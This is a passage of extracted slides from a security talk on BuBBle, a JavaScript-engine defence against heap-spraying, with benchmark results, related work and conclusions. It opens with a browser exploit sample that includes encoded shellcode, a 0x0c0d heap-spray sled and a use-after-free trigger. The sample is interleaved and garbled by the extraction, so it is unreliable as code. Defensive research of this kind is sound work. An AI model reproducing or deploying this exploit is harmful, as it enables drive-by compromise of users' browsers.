sss.length; i ++ ){ b2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fcud923%ud8d8%u205bud727%uc45cud8 arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString d9%u51d8%u5c5eud8d8%u51d8%u5446%ud8d8%u53d8%ub89eud8b2%ud8b2%ud8b2%u9e53%u8 ();cc=cc.replace(/ ,/ g, "" 8b8%u8e27%u1fe0%ua89eud8d8%ud8d8%u9e1fud8acud8d8%u59d8%ud81fud8dauebd8%u530 ); 3%uc86%ud8b2%u9e55%u88a8%ud8b0%ud8dcu8fd8%uae27%u27b8%udc8eu11ebud861%ud8dc cc = cc.replace(/@/g, ","); u58d8%ud7a4%u4d27%ud4acua458%u27d7%uacd8%u58ddud7acu4d27%u333au1b53%ud8f5%u eval(cc); d8dcu5bd8%ud820%udba7%u8651%ub2a8%u55d8%uac9eu2788%ua8aeu278fu5c6eud8d8%u27 var x1 = new Array(); d8%ue88eu3359%udcd8%ud8d8%u235bua7d8%u277dub8aeu8e27%u27ecu5c6eud8d8%u27d8% for (i = 0; i < 200; i ++ ){ uec8eu5e53%ud848%ud8d8%u4653%ud854%ud8d8%udc1fu84dbuf6b9%u8bbdu8e27%u53f4%u x1[i] = document.createElement("COMMENT"); 5466%ud8d8%u53d8%u485eud8d8%u1fd8%udfdcuba84%ubdf6%u3459%ud9d8%ud8d8%u0453% x1[i].data = "abc"; ud8b0%ud8d9%u8bd8%ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4%ueb23%ueb18%u59 } 03%ud834%ud8dau53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153%u ; 1b5buebc8%u8818%u8b89%u8888%u8888%u8888%u888fu5388%ud09eu2f30%ud8d8%u53d8%u var e1 = null; e4a6%uec30%ud8d9%u30d8%ud8efud8d8%ubbb0%uafaeub0d8%ub0abub7bcu538cud49eu6e3 function ev1(evt){ 0%ud8d8%u51d8%ue49eu79bcud8dcud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89 e1 = document.createEventObject(evt); eu4230%ud8d8%uebd8%u8b03%u8b8bu278bu3008%ud83dud8d8%u3459%ud9d8%ud8d8%u2453 document.getElementById("sp1").innerHTML = ""; %u1f5bu1fdcueadfu49acu1fd4%udc9fu51bbu9709%u9f1fu78d0%u4fbdu1f13%ud49fu9889 window.setInterval(ev2, 50); %ua762%u9f1fue6c8%u6ec5%u1fe1%ucc9fub160%uc30cu9f1fu66c0%ubea7%u1f78%uc49fu } 7124%u75efu9f1fu40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498%ua853%u75c4%ub053% function ev2(){ u53d0%u512fubc8eudcb2%u3081%ud87bud8d8%u3a48%ub020%ueaebud8d8%u8db0%ubdabu8 caaude53%uca30%ud8d8%u53d8%ub230%u81ddu5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u p = "u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d 58dcu30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0acu2753%u538du5534%udd98%u u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d 3827%ue030%ud8d8%u1bd8%ue058%u5830%u31e0%uc9adua059%u48ddu4848%uac48%ub03fu u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d d2d0%ud8d8%u9855%u27ddu3038%ud8cfud8d8%u301bud8c9%ud8d8%uc960%udcd9%u1a58%u u0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0du0c0d d8d4%uda33%u1b80%u2130%u2727%u8327%udf1eu5160%ud987%u1fbeudd9fu3827%u8b1bu0 u0c0du0c0d"; 453%ub28bub098%uc8d8%ud8d8%u538fuf89eu5e30%u2727%u8027%u891bu538eue4aduac53 for (i = 0; i < x1.length; i ++ ){ %ua0f6%u2ddbu538euf8aeu2ddbu11ebu9991%udb75%ueb1dud703%uc866%u0ee2%ud0acu13 x1[i].data = p; 19%udbdfu9802%u2933%uc7e3%u3fadu5386%ufc86%u05dbu53beu93d4%u8653%udbc4%u530 } 5%u53dcu1ddbu8673%u1b81%uc230%u2724%u6a27%u3a2au6a2cud7eeu28cbua390%ueae5%u ; 49acu5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4auc6a8%ubc7cu4b37%u3ceau5 var t = e1.srcElement; 64cud2cbua174%u3ee1%u1c40%uc755%u8faud5beu9b27%u7466%u4003%uc8d2%u5820%u770 } eu2342%ucd8bub0beuacacue2a8%uf7f7%ubdbcub7b5%uf6e9%uacbeub9a8%ubbbbuabbduf6 </script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></ abubbbbubcf7%ub5bd%uf7b7%ubcb9%ub2f6%ubfa8%u00d8"); body></html>
- 33. BuBBle: performance benchmarks • Macrobenchmarks • Sunspider Benchmark Suite • V8 • PeaceKeeper bench. • Memory overhead analysis
- 34. Benchmark Perf. Overhead Site URL Perf. overhead Richards 5.6% economist.com 5.6% DeltaBlue 3.6% amazon.com 4.7% Crypto 10% ebay.com 4.2% Ray Trace 1.5% facebook.com 4.9% Early Boyer 3.7% maps.google.com 3.2% RegExp 0.6% docs.google.com 6.3% Splay 1.8% cnn.com 4.8% Total 2.6% V8 Javascript Benchmarks youtube.com 4.9% Average 4.8% Macrobenchmarks Test Perf.Overhead 3d 0.17% bitops 0.89% controlflow 1.44% math 0.62% Benchmark Perf. Overhead regexp 0.23% Rendering 0.5% string Social Networking 0.5% base64 27.3% Complex Graphics 2.2% fasta 1.24% Data 14% tagcloud 2.20% DOM ops. 0.2% unpack 3.24% Text parsing 2.0% validate 9.30% Average 5.19% Total 2.8% Sunspider Javascript Benchmark Suite Peacekeeper Javascript Benchmarks
- 35. BuBBle: memory overhead • 1/24 changes • n-‐byte original string • i = n/24 • support data structure 2i bytes long • 8.3% memory overhead (theoretical and room for improvement)
- 36. BuBBle: memory overhead • 1/24 changes • n-‐byte original string • i = n/24 Benchmark Sunspider Mem. Overhead 5.6% • support data structure V8 4.2% 2i bytes long Peacekeeper 6.5% • 8.3% memory overhead Average 5.3% Memory overhead analysis from proc file system (theoretical and room for improvement)
- 37. Related work • ASLR Bhatkar, S., Duvarney, D.C., Sekar, R.: Address obfuscation: An efficient approach to combat a broad range of memory error exploits. Proceedings of the 12th USENIX Security Symposium, Washington, D.C., U.S.A., August 2003 • DEP Data Execution Prevention: Windows Server 2003 with SP1 • Nozzle Ratanaworabhan, P., Livshits, B., Zorn, B.: Nozzle: A defense against heap-spraying code injection attacks. Technical report, Microsoft Research (November 2008) • Shellcode detection Egele,M.,Wurzinger,P.,Kruegel,C.,Kirda,E.:Defending browsers against drive-by downloads: mitigating heap-spraying code injection attacks. In: Flegel, U., Bruschi, D. (eds.) Detection of Intrusions and Malware, and Vulnerability Assessment. LNCS, vol. 5587, pp. 88– 106. Springer, Heidelberg (2009)
- 38. Conclusion • Lightweight solution(e.g. Mozilla Firefox, Mozilla Fennec) • Implemented for Javascript strings • Allocation of malicious objects from external media (mp3, ... ) • Future dev: protect arrays of integers, protect other engines • Not just for browsers
- 40. ?